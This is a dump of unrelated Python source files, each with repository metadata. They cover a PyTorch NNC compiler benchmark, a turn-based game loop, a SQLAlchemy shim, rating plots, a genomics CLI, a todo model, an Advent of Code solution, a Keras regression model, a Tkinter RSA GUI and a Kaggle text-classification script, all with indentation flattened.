lowering_functions[torch.mm] = mm_lower
def lower_function(node, op, nnc_args, args):
inp_shapes = fx.node.map_aggregate(args, lambda arg: (arg.shape, arg.dtype) if isinstance(arg, fx.Node) else None)
return lowering_functions[op](node.name, node.shape, inp_shapes, nnc_args)
def nnc_compile(model: torch.nn.Module, example_inputs) -> torch.nn.Module:
"""
nnc_compile(model, example_inputs) returns a function with the same args
as `model.forward`, with an extra argument corresponding to where the
output is stored. This function takes the inputs (which must be PyTorch
tensors with the same shapes as example_inputs), and passes them to an
NNC executor.
"""
fx_model = fx.symbolic_trace(model)
ShapeProp(fx_model).propagate(*example_inputs)
# This env maps from nodes to `te.ExprHandle`, which represent the output
# of an NNC computation.
env = {}
def get_te_shapes(node):
return [te.ExprHandle.int(i) for i in node.shape]
def get_nnc_type(dtype):
if dtype == torch.float:
return te.Dtype.Float
elif dtype == torch.long:
return te.Dtype.Long
else:
raise RuntimeError("nyi")
def get_te_type(node):
return get_nnc_type(node.dtype)
def gen_compute(args):
te_args = [env[arg.name] for arg in args]
def lookup_env(l):
return fx.node.map_aggregate(l, lambda x: env[x.name] if isinstance(x, fx.Node) else x)
def fetch_attr(target : str):
target_atoms = target.split('.')
attr_itr = fx_model
for i, atom in enumerate(target_atoms):
if not hasattr(attr_itr, atom):
raise RuntimeError(f"Node referenced nonexistant target {'.'.join(target_atoms[:i])}")
attr_itr = getattr(attr_itr, atom)
return attr_itr
outs = None
inputs = []
module_attrs = []
for node in fx_model.graph.nodes:
if node.op == 'placeholder':
# We simply map the input placeholder to a `te.Placeholder`, which
# also represents an input to the NNC computation.
shapes = get_te_shapes(node)
env[node.name] = te.Placeholder(node.name, get_te_type(node), shapes)
inputs.append(env[node.name])
elif node.op == 'call_function':
# This does the bulk of the work - we call `lower_function`, which
# returns a `te.ExprHandle` (the output of a NNC computation), and
# put it in our environment.
result = lower_function(node, node.target, lookup_env(node.args), node.args)
env[node.name] = result
elif node.op == 'output':
outs = list(lookup_env(node.args))
elif node.op == 'get_attr':
# As NNC doesn't have any concept of state, we pull out the module
# attributes and pass them in as inputs to NNC.
module_attrs.append(node)
env[node.name] = te.Placeholder(node.name, get_te_type(node), shapes)
else:
raise RuntimeError("not yet implemented")
loopnest = te.LoopNest(outs)
loopnest.prepare_for_codegen()
stmt = te.simplify(loopnest.root_stmt())
cg = te.construct_codegen('llvm', stmt, [te.BufferArg(x) for x in [env[i.name] for i in module_attrs] + inputs + outs])
def f(inps):
module_stuff = [fetch_attr(i.target) for i in module_attrs]
cg.call(module_stuff + list(inps))
return f
################################
# Example usage and Benchmarking
################################
if __name__ == '__main__':
class DeepAndWide(torch.nn.Module):
def __init__(self, num_features=50):
super(DeepAndWide, self).__init__()
self.mu = torch.nn.Parameter(torch.randn(1, num_features))
self.sigma = torch.nn.Parameter(torch.randn(1, num_features))
self.fc_w = torch.nn.Parameter(torch.randn(1, num_features + 1))
self.fc_b = torch.nn.Parameter(torch.randn(1))
def forward(self, ad_emb_packed, user_emb, wide):
wide_offset = wide + self.mu
wide_normalized = wide_offset * self.sigma
wide_preproc = torch.clamp(wide_normalized, 0., 10.)
user_emb_t = torch.transpose(user_emb, 1, 2)
dp_unflatten = torch.bmm(ad_emb_packed, user_emb_t)
dp = torch.flatten(dp_unflatten, 1, -1)
inp = torch.cat([dp, wide_preproc], 1)
t1 = torch.transpose(self.fc_w, 1, 0)
fc1 = torch.addmm(self.fc_b, inp, t1)
return fc1
with kernel_arena_scope():
with torch.no_grad():
num_features = 50
mod = DeepAndWide(num_features)
# Phabricate sample inputs
batch_size = 1
embedding_size = 32
ad_emb_packed = torch.randn(batch_size, 1, embedding_size)
user_emb = torch.randn(batch_size, 1, embedding_size)
wide = torch.randn(batch_size, num_features)
inps = (ad_emb_packed, user_emb, wide)
out = torch.empty(batch_size, 1)
mod = decompose(mod, inps)
cg = nnc_compile(mod, inps)
iters = 1000
for _ in range(10):
cg([ad_emb_packed, user_emb,wide, out])
begin = time.time()
for _ in range(iters):
cg([ad_emb_packed, user_emb,wide, out])
print("NNC time: ", time.time()-begin)
mod_jit = torch.jit.script(DeepAndWide(num_features))
for _ in range(10):
mod_jit(ad_emb_packed, user_emb,wide)
begin = time.time()
for _ in range(iters):
mod_jit(ad_emb_packed, user_emb,wide)
print("PyTorch time", time.time()-begin)
static_runtime = torch._C._jit_to_static_runtime(mod_jit._c)
for _ in range(10):
static_runtime.run([ad_emb_packed, user_emb,wide])
begin = time.time()
for _ in range(iters):
static_runtime.run([ad_emb_packed, user_emb,wide])
print("Static Runtime time", time.time()-begin)
print("Sums:", out.sum(), mod(*inps).sum())
|
[
"horacehe2007@yahoo.com"
] |
horacehe2007@yahoo.com
|
891868a38e89c658e7a8d4f0a2248f793626814f
|
a11bd8615f47c15fb52cd83fe7722309f250537d
|
/pytgf/game/turnbased/tb_mainloop.py
|
a0a157cd86eef1b1af64b551ad569c2e59f90f6d
|
[] |
no_license
|
Angeall/pyTGF
|
75a0abfc6605f08c93181248bd529279c01b05bc
|
463359a6596598c0c6cceb6e30f393d77eca0a89
|
refs/heads/master
| 2021-01-12T12:21:10.659708
| 2018-09-02T12:37:58
| 2018-09-02T12:37:58
| 72,452,959
| 0
| 0
| null | 2017-05-28T11:41:09
| 2016-10-31T16:00:45
|
Python
|
UTF-8
|
Python
| false
| false
| 959
|
py
|
from typing import List
from .tb_api import TurnBasedAPI
from ..mainloop import MainLoop
from ...characters.moves import MoveDescriptor
from ...characters.units import Unit
from ...controls.wrappers import ControllerWrapper
class TurnBasedMainLoop(MainLoop):
def __init__(self, api: TurnBasedAPI):
super().__init__(api)
def _reactToFinishedMove(self):
self.api.switchToNextPlayer()
self._currentTurnTaken = False
def _getPlayerNumbersToWhichSendEvents(self) -> List[int]:
return [self.api.getNextPlayer()]
def _mustRetrieveNextMove(self, current_wrapper: ControllerWrapper) -> bool:
# TODO -- LAP !
return self.api.isCurrentPlayer(current_wrapper.controller.playerNumber) and not self._currentTurnTaken
def _mustSendInitialWakeEvent(self, initial_action: MoveDescriptor, unit: Unit) -> bool:
return initial_action is None and unit.playerNumber == self.api.getCurrentPlayer()
|
[
"angeal1105@gmail.com"
] |
angeal1105@gmail.com
|
d71bcb821a1117a890833605c7e796bacff6f3be
|
ce083128fa87ca86c65059893aa8882d088461f5
|
/python/flask-mail-labs/.venv/lib/python2.7/site-packages/sqlalchemy/databases/__init__.py
|
05161c069c5486ac7c098a9893e2648a77b30f32
|
[] |
no_license
|
marcosptf/fedora
|
581a446e7f81d8ae9a260eafb92814bc486ee077
|
359db63ff1fa79696b7bc803bcfa0042bff8ab44
|
refs/heads/master
| 2023-04-06T14:53:40.378260
| 2023-03-26T00:47:52
| 2023-03-26T00:47:52
| 26,059,824
| 6
| 5
| null | 2022-12-08T00:43:21
| 2014-11-01T18:48:56
| null |
UTF-8
|
Python
| false
| false
| 979
|
py
|
# databases/__init__.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Include imports from the sqlalchemy.dialects package for backwards
compatibility with pre 0.6 versions.
"""
from ..dialects.sqlite import base as sqlite
from ..dialects.postgresql import base as postgresql
postgres = postgresql
from ..dialects.mysql import base as mysql
from ..dialects.drizzle import base as drizzle
from ..dialects.oracle import base as oracle
from ..dialects.firebird import base as firebird
from ..dialects.informix import base as informix
from ..dialects.mssql import base as mssql
from ..dialects.sybase import base as sybase
__all__ = (
'drizzle',
'firebird',
'informix',
'mssql',
'mysql',
'postgresql',
'sqlite',
'oracle',
'sybase',
)
|
[
"marcosptf@yahoo.com.br"
] |
marcosptf@yahoo.com.br
|
1efc690b062f0b48f50f0a1c1b6619f5c024c81e
|
cc6e36ce306a46c1accc3e979362de34b6063b7e
|
/stats/plots.py
|
1b266a8acc502da245aada68b8a7854e5d440dca
|
[] |
no_license
|
bartromgens/petanque-stats-server
|
d51995e2b4d288a0a99563347c3bf3db863918bf
|
9f7e48a7670b1c2c89f1bfcb2ac5ed8c8e9a7fe0
|
refs/heads/master
| 2020-03-22T19:23:18.230361
| 2018-07-29T00:46:02
| 2018-07-29T00:46:02
| 140,524,341
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,360
|
py
|
from matplotlib import pyplot
import numpy
import trueskill
def plot_rating_history(rankings_history, show_range=True, begin=0):
fig = pyplot.figure(figsize=(10, 6))
ax = fig.add_subplot(111)
player_rankings = {}
for rankings in rankings_history:
for player, ranking in rankings.items():
if player == 'admin':
continue
if player not in player_rankings:
player_rankings[player] = {}
player_rankings[player]['mu'] = []
player_rankings[player]['sigma'] = []
# if len(player_rankings[player]['mu']) > 0 and player_rankings[player]['mu'][-1] == ranking.mu:
# continue
player_rankings[player]['mu'].append(ranking.mu - trueskill.MU)
player_rankings[player]['sigma'].append(ranking.sigma)
for player, y in player_rankings.items():
# if len(y['mu']) < 10:
# continue
mu = numpy.array(y['mu'])[begin:]
sigma = numpy.array(y['sigma'])[begin:]
t = numpy.arange(len(mu))
ax.plot(mu, label=player, lw=2)
if show_range:
ax.fill_between(t, mu - sigma/6, mu + sigma/6, alpha=0.15)
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles, labels, loc='upper left')
fig.tight_layout()
fig.savefig('test.png')
|
[
"bart.romgens@gmail.com"
] |
bart.romgens@gmail.com
|
4b55c81124dc2f1689fa1674157111ca708a47c2
|
8aac3ae9588ca4accd87eaaf0a7517edc3efc1b5
|
/src/cortexpy/command/subgraph.py
|
4dfea3d6e9db0e3cc1e1b796a38e58ff3e75393f
|
[
"Apache-2.0"
] |
permissive
|
winni2k/cortexpy
|
453cf7e1b764494c65b1d87622fd7a5007f6ba30
|
7156d2872b0d5fe94b072201a094b5fc5acc384b
|
refs/heads/master
| 2021-01-23T16:21:28.526647
| 2020-03-15T09:11:37
| 2020-03-15T09:11:37
| 102,736,885
| 2
| 1
|
Apache-2.0
| 2020-03-15T09:11:39
| 2017-09-07T12:54:59
|
Python
|
UTF-8
|
Python
| false
| false
| 4,576
|
py
|
def subgraph(argv):
import argparse
from .shared import get_shared_argparse
import cortexpy.constants
shared_parser = get_shared_argparse()
parser = argparse.ArgumentParser(
'cortexpy subgraph', parents=[shared_parser],
description="""
Find all subgraphs from every k-mer in an initial contig.
Input and output are cortex graphs.
"""
)
parser.add_argument('initial_contig', help="Initial contig from which to start traversal")
parser.add_argument('--graphs', nargs='+',
required=True,
help="Input cortexpy graphs."
" Multiple graphs can be specified and are joined on-the-fly.")
parser.add_argument('--orientation',
type=cortexpy.constants.EngineTraversalOrientation,
choices=[o.name for o in cortexpy.constants.EngineTraversalOrientation],
default=cortexpy.constants.EngineTraversalOrientation.both,
help='Traversal orientation')
parser.add_argument('-c', '--colors',
nargs='+',
type=int,
help="""Colors to traverse. May take multiple color numbers separated by
a space. The traverser will follow all colors
specified. Will follow all colors if not specified.
""", default=None)
parser.add_argument('--initial-fasta', action='store_true',
help='Treat initial_contig as a file in FASTA format')
parser.add_argument('--max-nodes', type=int, default=None,
help='Maximum number of nodes to traverse (int).'
' Die without output if max nodes is exceeded')
parser.add_argument('--logging-interval', type=int, default=90,
help='Logging interval. [default: %(default)s]')
parser.add_argument('--cache-size', type=int, default=0, help='Number of kmers to cache')
parser.add_argument('--binary-search-cache-size', type=int, default=0,
help='Number of kmers to cache for binary search')
parser.add_argument('--slurp', action='store_true',
help='Slurp all cortex graphs before traversal')
args = parser.parse_args(argv)
from cortexpy.logging_config import configure_logging_from_args_and_get_logger
logger = configure_logging_from_args_and_get_logger(args, 'cortexpy.traverse')
import sys
from cortexpy.graph.serializer.kmer import dump_colored_de_bruijn_graph_to_cortex
from cortexpy.graph.parser.random_access_collection import RandomAccessCollection
from cortexpy.constants import EngineTraversalOrientation
from cortexpy.graph.traversal.engine import Engine
from contextlib import ExitStack
with ExitStack() as stack:
if args.out == '-':
output = sys.stdout.buffer
else:
output = stack.enter_context(open(args.out, 'wb'))
if args.slurp:
from cortexpy.graph.parser.random_access import SlurpedRandomAccess
RAClass = SlurpedRandomAccess.from_handle
logger.info("Slurping cortex graphs")
else:
from cortexpy.graph.parser.random_access import RandomAccess as RAClass
if len(args.graphs) == 1:
ra_parser = RAClass(
stack.enter_context(open(args.graphs[0], 'rb')),
kmer_cache_size=args.cache_size
)
else:
ra_parser = RandomAccessCollection(
[RAClass(stack.enter_context(open(graph_path, 'rb')),
kmer_cache_size=args.cache_size)
for graph_path in args.graphs])
engine = Engine(
ra_parser,
orientation=EngineTraversalOrientation[args.orientation.name],
max_nodes=args.max_nodes,
logging_interval=args.logging_interval
)
if args.colors is not None:
engine.traversal_colors = args.colors
else:
engine.traversal_colors = tuple(list(range(engine.ra_parser.num_colors)))
logger.info('Traversing colors: ' + ','.join([str(c) for c in engine.traversal_colors]))
if args.initial_fasta:
engine.traverse_from_each_kmer_in_fasta(args.initial_contig)
else:
engine.traverse_from_each_kmer_in(args.initial_contig)
dump_colored_de_bruijn_graph_to_cortex(engine.graph, output)
|
[
"wkretzsch@gmail.com"
] |
wkretzsch@gmail.com
|
382da2a224bb2008b005eaaf62f525a7c7336e1f
|
5d0b026aeba72c828f4a7431f232144263247d37
|
/todo/models.py
|
12a8d8872e188a59596e4510fbd80d00e0ee106a
|
[] |
no_license
|
thewolfcommander/todo-fastapi
|
b4189628a617326f3574a402c21c4dea95dbb6eb
|
95e4c2fd841418eb93499d70aa934f22d28d2b2d
|
refs/heads/main
| 2023-01-01T22:09:46.155199
| 2020-10-20T01:39:22
| 2020-10-20T01:39:22
| 305,527,847
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 514
|
py
|
from datetime import datetime
from sqlalchemy import (
Column,
Integer,
String,
Boolean,
DateTime
)
from todo.database import Base
class Todo(Base):
"""
Model for handling Todos
"""
__tablename__ = "todos"
id = Column(Integer, index=True, primary_key=True)
title = Column(String(255), index=True)
description = Column(String)
added = Column(DateTime, default=datetime.now)
updated = Column(DateTime, default=datetime.now)
status = Column(String(50))
|
[
"tyagimanojtyagi.22@gmail.com"
] |
tyagimanojtyagi.22@gmail.com
|
fcdc3aa3d46bf734f91c559e161d9bdb3146197f
|
7bef4bbdd6e35b34726f30997c2f42f72e45ceb8
|
/day6/day6-2.py
|
8ac169f332a21f63d2cb1c7654d2eadab21ec0bc
|
[] |
no_license
|
paulbombarde/AdventOfCode2020
|
dfe1ad2a16d13282b7952b05b5be778303476eaa
|
0635d19ba3ae955a582989edb457b125e68f3438
|
refs/heads/main
| 2023-02-07T13:18:20.274183
| 2020-12-29T18:32:27
| 2020-12-29T18:32:27
| 321,311,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 554
|
py
|
import sys
from collections import defaultdict
with open(sys.argv[1]) as input :
count = 0
group = defaultdict(int)
gl = []
for l in input :
l = l.rstrip()
if len(l) == 0 :
for k,v in group.items() :
if v == len(gl) :
count += 1
print(gl,group, count)
group.clear()
gl.clear()
else:
for c in l :
group[c] += 1
gl.append(l)
count += len(group)
print(gl,group,len(group), count)
|
[
"p.bombarde@WIN-19-020"
] |
p.bombarde@WIN-19-020
|
27c2a4c36af024fcbcc6e43301976a3c576c4eb3
|
3b5a2a4df578adaa7640498661232a88710db436
|
/Python/Veri Yapıları-Temel Kavramlar/Print Metodu.py
|
beac27dbf8a3185b87babc045911fc3179f1e200
|
[] |
no_license
|
mertsigirci11/Python-Calismalari
|
ba87b87503cb8b1e924fd0534d0000fc27019a45
|
167c3e3e54049491b02a0cacba1f4c2c55508ff7
|
refs/heads/main
| 2023-06-30T08:28:01.141643
| 2021-07-30T11:24:24
| 2021-07-30T11:24:24
| 391,038,838
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 351
|
py
|
"""
---------PRİNT METODU KULLANIMI--------------
"""
print("Hello","AI","ERA")
print("Geleceği Yazanlar", "Turkcell",sep="_")
#sep argümanı iki string arasını deafault olan boşluk harici bir şey ile doldurmak için kullanılır.
print("Geleceği Yazanlar", "Turkcell",end="_")
#end argümanı string sonuna herhangi bir şey ekler.
|
[
"noreply@github.com"
] |
mertsigirci11.noreply@github.com
|
e86f7c2044372927e6cdca345b722fefe2dfdb3c
|
be85440729998fb00690202222eda56c19d79f70
|
/django_school/classroom/filters.py
|
282e81aa99364ad576f8bc5f61e5bd9b51cb44fd
|
[] |
no_license
|
HamdaniFatima/PlateformeCapMat
|
7b8309093c0b19d5e26231df92b8b2c34343f27b
|
cc02b61d55c4b0c1b3e3619e483445e485c91f5f
|
refs/heads/master
| 2022-05-22T04:02:05.846943
| 2020-04-27T12:45:39
| 2020-04-27T12:45:39
| 259,312,513
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 503
|
py
|
import django_filters
from classroom.models import Quiz, Profile, Student, Capteur
class CasesFilter (django_filters.FilterSet):
class Meta:
model = Quiz
fields = [ 'subject',]
class ExpertsFilter (django_filters.FilterSet):
class Meta:
model = Student
fields = ['interests', 'domaine']
class CapteurFilter (django_filters.FilterSet):
class Meta:
model = Capteur
fields = [ 'subject', 'domaine', 'technologie_utilisee', 'type_evt' ]
|
[
"hanane33hanine@gmail.com"
] |
hanane33hanine@gmail.com
|
816bd2586090e45edac82d0f677783087078bcb2
|
c443a7cd3a4c2ea3be746a5cfd343d59a555cff9
|
/boston/original_boston.py
|
beb469d215548f386039492b39280fe153bc8f98
|
[] |
no_license
|
woshidandan/fnnmOS_ELM
|
0dacf1944235924aa5fbe174f8c29a6314989615
|
0eb6a5000854284fe050a6ff7001aa93b03c1381
|
refs/heads/master
| 2021-08-15T18:15:35.985541
| 2020-05-12T03:10:53
| 2020-05-12T03:10:53
| 178,802,233
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,733
|
py
|
from keras.datasets import boston_housing
from keras.models import Sequential
from keras.layers import Dense,BatchNormalization,Dropout,Reshape,Flatten
from keras.layers.convolutional import Conv2D,MaxPooling2D,Conv1D,MaxPooling1D
import numpy as np
import os
import keras
import tensorflow as tf
from model import OSELM
import numpy as np
from keras.engine import Model
model_name = 'boston.h5'
(x_train, y_train), (x_test, y_test) = boston_housing.load_data()
print(x_train.shape)
# y_train = keras.utils.to_categorical(y_train, 1)
print(y_train.shape)
model = Sequential(name='boston')
model.add(BatchNormalization(input_shape=(13,)))
model.add(Reshape((13, 1,1)))
model.add(Conv2D(filters=13, strides=1, padding='same', kernel_size=1, activation='sigmoid'))
model.add(Conv2D(filters=26, strides=2, padding='same', kernel_size=2, activation='sigmoid'))
model.add(MaxPooling2D(pool_size=2, strides=1, padding='same'))
model.add(Conv2D(filters=52, strides=1, padding='same', kernel_size=1, activation='sigmoid'))
model.add(Conv2D(filters=104, strides=2, padding='same', kernel_size=2, activation='sigmoid'))
model.add(MaxPooling2D(pool_size=2, strides=1, padding='same'))
model.add(Flatten())
model.add(Dropout(0.5))
model.add(Dense(1))
# model.load_weights(model_name)
model.compile('adam','mae',metrics=['accuracy'])
model.summary()
history=model.fit(x_train,y_train,batch_size=404,epochs=10000,verbose=1,validation_data=(x_test,y_test))
# model.save(model_name)
print(history.history)
print("acc:{},loss:{}".format(history.history['acc'],history.history['loss']))
# f=open("result.txt",'a')
# f.write(str(history.history['val_loss'][-1])+"\n")
# f.close()
#
# def hidden_layer_generate(model):
#
# """
# CNNの中間層の出力を取得するモデルの構築
# :param cnn_model: CNNモデル
# :return:
# """
#
# layer_name = 'dense_1'
# hidden_layer_model = Model(inputs=model.input, outputs=model.get_layer(layer_name).output)
#
# cnn_train_result = hidden_layer_model.predict(x_train)
# cnn_test_result = hidden_layer_model.predict(x_test)
# return hidden_layer_model, cnn_train_result, cnn_test_result
#
#
#
# hidden_num = 1
# ###
# batch_size = 20
# ###
#
#
# tf.set_random_seed(2016) #随机序列可重复
# sess = tf.Session()
# # while(hidden_num < 700):
# elm = OSELM(sess, batch_size, 1, hidden_num, 1)
# #
# # data_train_2d, data_test_2d, target_train, target_test = load_mnist_2d()
# # # print(target_train.shape) 1203
# # cnn_model = cnn_generate(data_train_2d, target_train)
#
# hidden_layer_model, cnn_train_result, cnn_test_result= hidden_layer_generate(model)
# # print(cnn_train_result.shape)
# # print("cnn_train_result") #(42500, 10)
# # print(cnn_train_result.shape)
#
#
#
# epoch = 0
# data_container = []
# target_container = []
# # target_train_convert = Y_train
# # print("Y_train") (42500, 10)
# # print(Y_train.shape)
# # target_test_convert = np_utils.to_categorical(target_test, NUM_CLASS)
#
# #test
# # print("X_test")
# # print(X_test.shape)
# # Y_test = np.array(Y_test)
# # print("Y_test")
# # print(Y_test.shape)
#
# # print("hidden_num:{},batch_size: {}".format(hidden_num,batch_size))
# # print("-------------------------------------------------------------------")
# while(epoch < 40):
# k = 0
#
# for (index,data) in enumerate(cnn_train_result, start= 0 ):
# if(index >= (epoch) * batch_size and index < (epoch+1) * batch_size):
# # if (index >= (epoch ) * batch_size and index < (epoch +1) * batch_size):
# # print(data.shape)
# data_container.append(data)
# k += 1
# if k == batch_size:
# break
# # print(data_container.shape)
#
# j = 0
# for (index1,target) in enumerate(y_train, start= 0):
# if (index1 >= (epoch) * batch_size and index1 < (epoch + 1) * batch_size):
# # if (index >= (epoch) * batch_size and index < (epoch + 1) * batch_size):
# target_container.append(target)
# j += 1
# if j == batch_size:
# break
# # print(target_container)
# data_container = np.array(data_container)
#
# target_container = np.array(target_container)
# target_container = target_container[:, np.newaxis] #将一维(32,)转化为二维(32,1)
#
#
# elm.train(data_container, target_container)
# # elm.test(data_container, target_container)
# # # elm.test(X_test, Y_test)
# y_test = y_test[:, np.newaxis]
# elm.test(cnn_test_result, y_test)
# # # elm.test(data_container, target_container)
#
#
# # print(epoch)
# epoch += 1
# data_container = []
# target_container = []
# # hidden_num = 10 + hidden_num;
# # print(hidden_num)
|
[
"2281444815@qq.com"
] |
2281444815@qq.com
|
7b5c26327d7571b858c464c09b47679881449f01
|
e237724f4448c5789915e4a85a44db3028b16ac1
|
/GUI/GUI.py
|
dd459aa8845104963ddde87096209549583d62bc
|
[] |
no_license
|
HugoAhoy/RSA
|
9dc7e47235f50aa0c7994b160520095b6f90bf47
|
64d3feb973628adb6ab9bb46ca470ee94a1d33a7
|
refs/heads/main
| 2023-09-01T04:28:43.813878
| 2021-11-08T08:59:46
| 2021-11-08T08:59:46
| 418,938,432
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,399
|
py
|
from tkinter import *
from tkinter.ttk import *
from methods import *
from subprocess import Popen
from subprocess import PIPE
p = Popen("GUI/RSA.exe", stdin=PIPE, stdout=PIPE)
# 窗口生成
window = Tk()
window.title("RSA")
window.geometry("800x600")
# 标签页生成
tab = Notebook(window)
frame1 = Frame(tab)
tab1 = tab.add(frame1, text = "密钥生成")
frame2 = Frame(tab)
tab2 = tab.add(frame2, text = "加密")
frame3 = Frame(tab)
tab3 = tab.add(frame3, text = "解密")
tab.pack(padx=5,pady=5,expand = True, fill = BOTH)
# 设置选中tab1
tab.select(frame1)
# 密钥生成标签页元素
RSA_length = Label(frame1, text = "加密等级: ")
level_combo = Combobox(frame1)
level_combo['values'] = ("RSA-256","RSA-512","RSA-768","RSA-1024","RSA-2048")
level_combo.current(1)
priv_label = Label(frame1, text="私钥D: ")
priv_content =Label(frame1,wraplength=260)
pub_n_label = Label(frame1, text="公钥N: ")
pub_n_content =Label(frame1,wraplength=260)
pub_e_label = Label(frame1, text="公钥E: ")
pub_e_content =Label(frame1,wraplength=260)
gen_btn = Button(frame1, text="生成",command=lambda: generate_key(p,level_combo,pub_n_content,pub_e_content,priv_content))
save_btn = Button(frame1, text="保存",command=lambda: save_keys(pub_n_content,pub_e_content,priv_content))
# 加密标签页元素
en_public_n_label = Label(frame2, text = "公钥N: ")
en_public_n_Content = Label(frame2,wraplength=260)
en_public_e_label = Label(frame2, text = "公钥E: ")
en_public_e_Content = Label(frame2,wraplength=260)
en_cwe_label = Label(frame2, text = "明文: ")
en_content_without_encrypt = Text(frame2, height=5) # 创建文本框控件,并制定文本框的高度
en_ce_label = Label(frame2, text = "密文: ")
en_content_encrypt = Text(frame2, height=5) # 创建文本框控件,并制定文本框的高度
en_open_privkey_btn = Button(frame2, text="打开公钥",command=lambda: read_public_key(en_public_n_Content, en_public_e_Content))
en_encrypt_btn = Button(frame2, text="加密", command=lambda: encrypt(en_public_e_Content,en_public_n_Content,en_content_without_encrypt, en_content_encrypt))
# 解密标签页元素
de_public_n_label = Label(frame3, text = "公钥N: ")
de_public_n_Content = Label(frame3,wraplength=260)
de_priv_d_label = Label(frame3, text = "私钥D: ")
de_priv_d_Content = Label(frame3,wraplength=260)
de_cwe_label = Label(frame3, text = "明文: ")
de_content_without_encrypt = Text(frame3, height=5) # 创建文本框控件,并制定文本框的高度
de_ce_label = Label(frame3, text = "密文: ")
de_content_encrypt = Text(frame3, height=5) # 创建文本框控件,并制定文本框的高度
de_open_privkey_btn = Button(frame3, text="打开私钥",command=lambda: read_private_key(de_public_n_Content, de_priv_d_Content))
de_encrypt_btn = Button(frame3, text="解密", command=lambda: decrypt(de_priv_d_Content,de_public_n_Content,de_content_encrypt, de_content_without_encrypt))
# 密钥生成标签页排版
RSA_length.grid(column=1, row=0,sticky='w')
level_combo.grid(column=2, row=0)
priv_label.grid(column=0, row=3,sticky='n')
priv_content.grid(column=1, row=3,columnspan=4)
pub_n_label.grid(column=0, row=5,sticky='n')
pub_n_content.grid(column=1, row=5,columnspan=4)
pub_e_label.grid(column=0, row=7,sticky='n')
pub_e_content.grid(column=1, row=7,columnspan=4)
gen_btn.grid(column=3, row=0,sticky='w')
save_btn.grid(column=4, row=0,sticky='w')
# 加密标签页排版
en_public_n_label.grid(column=0, row=1,sticky='n')
en_public_n_Content.grid(column=1, row=1)
en_public_e_label.grid(column=0, row=2,sticky='n')
en_public_e_Content.grid(column=1, row=2)
en_cwe_label.grid(column=0,row=4)
en_content_without_encrypt.grid(column=1,row=4, columnspan=2)
en_ce_label.grid(column=0,row=5)
en_content_encrypt.grid(column=1,row=5, columnspan=2)
en_open_privkey_btn.grid(column=1, row=0)
en_encrypt_btn.grid(column=2, row=0)
# 解密标签页排版
de_public_n_label.grid(column=0, row=1,sticky='n')
de_public_n_Content.grid(column=1, row=1)
de_priv_d_label.grid(column=0, row=2,sticky='n')
de_priv_d_Content.grid(column=1, row=2)
de_cwe_label.grid(column=0,row=4)
de_content_without_encrypt.grid(column=1,row=4, columnspan=2)
de_ce_label.grid(column=0,row=5)
de_content_encrypt.grid(column=1,row=5, columnspan=2)
de_open_privkey_btn.grid(column=1, row=0)
de_encrypt_btn.grid(column=2, row=0)
window.mainloop()
|
[
"zhjd3302@outlook.com"
] |
zhjd3302@outlook.com
|
2942ff8ebf61167582d61aba9c9506af64a8120e
|
3ec14117e72329ae8bfa174f1eae92433ebc6bd6
|
/toxic_comments/lgbm.py
|
7e9613b295d49674688d3d84ff63944a36166f77
|
[] |
no_license
|
Matafight/Kaggle
|
cd2dd5d0f9e5e52aba2c1c7afdac00a3860303d8
|
1ef5a44056afdfb7f5997dbde46416600f368045
|
refs/heads/master
| 2021-01-21T01:46:42.165350
| 2019-03-10T08:44:07
| 2019-03-10T08:44:07
| 56,367,062
| 7
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,704
|
py
|
#_*_coding:utf-8_*_
import sys
sys.path.append('..')
#sys.path.append('../kaggle_methods')
from dm_methods.kaggle_methods.ridge import ridge_cv
from dm_methods.kaggle_methods.xgboost_classification import xgboost_classification_cv
from dm_methods.kaggle_methods.logistic_regression import LogisticRegression_CV
from dm_methods.kaggle_methods.svc import SVC_CV
from dm_methods.kaggle_methods.nb_classification import GaussianNB_CV
from dm_methods.kaggle_methods.random_forest_classification import RandomForest_CV
from dm_methods.kaggle_methods.lightgbm_classification import lightgbm_CV
#from ridge import ridge_cv
from sklearn import metrics
import re
import time
from scipy.sparse import csr_matrix
from sklearn.preprocessing import MinMaxScaler
import gc
from contextlib import contextmanager
import string
from scipy.sparse import hstack
from sklearn.feature_extraction.text import TfidfVectorizer
class Timer:
def __enter__(self):
self.start = time.clock()
return self
def __exit__(self, *args):
self.end = time.clock()
self.interval = self.end - self.start
@contextmanager
def timer(name):
"""
Taken from Konstantin Lopuhin https://www.kaggle.com/lopuhin
in script named : Mercari Golf: 0.3875 CV in 75 LOC, 1900 s
https://www.kaggle.com/lopuhin/mercari-golf-0-3875-cv-in-75-loc-1900-s
"""
t0 = time.time()
yield
print(name+' done in {} s'.format(time.time()-t0))
#处理数据
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
df_train = pd.read_csv('./input/train.csv').fillna(" ")
df_test = pd.read_csv('./input/test.csv').fillna(" ")
df_train = df_train.loc[:1000,:]
df_test = df_test.loc[:1000,:]
label_name = ['toxic','severe_toxic','obscene','threat','insult','identity_hate']
train_label = df_train[label_name]
#df_all = pd.concat([df_train[['id','comment_text']],df_test],axis=0)
#add on 2018/3/5
# Contraction replacement patterns
cont_patterns = [
('(W|w)on\'t', 'will not'),
('(C|c)an\'t', 'can not'),
('(I|i)\'m', 'i am'),
('(A|a)in\'t', 'is not'),
('(\w+)\'ll', '\g<1> will'),
('(\w+)n\'t', '\g<1> not'),
('(\w+)\'ve', '\g<1> have'),
('(\w+)\'s', '\g<1> is'),
('(\w+)\'re', '\g<1> are'),
('(\w+)\'d', '\g<1> would'),
]
patterns = [(re.compile(regex), repl) for (regex, repl) in cont_patterns]
def prepare_for_char_n_gram(text):
""" Simple text clean up process"""
# 1. Go to lower case (only good for english)
# Go to bytes_strings as I had issues removing all \n in r""
clean = text
# 2. Drop \n and \t
clean = clean.replace("\n", " ")
